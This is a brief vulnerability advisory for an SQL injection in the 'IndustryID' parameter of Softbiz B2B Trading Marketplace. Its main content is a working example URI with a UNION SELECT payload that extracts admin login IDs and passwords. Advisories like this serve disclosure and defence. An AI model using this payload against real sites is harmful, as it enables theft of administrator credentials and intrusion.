Softbiz B2B Trading Marketplace 'IndustryID' Parameter SQL Injection Vulnerability

Softbiz B2B Trading Marketplace 'IndustryID' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/path/buyers_subcategories.php?IndustryID=1+union+select+1,2,concat(LoginID,0x3d,password)+from+admin--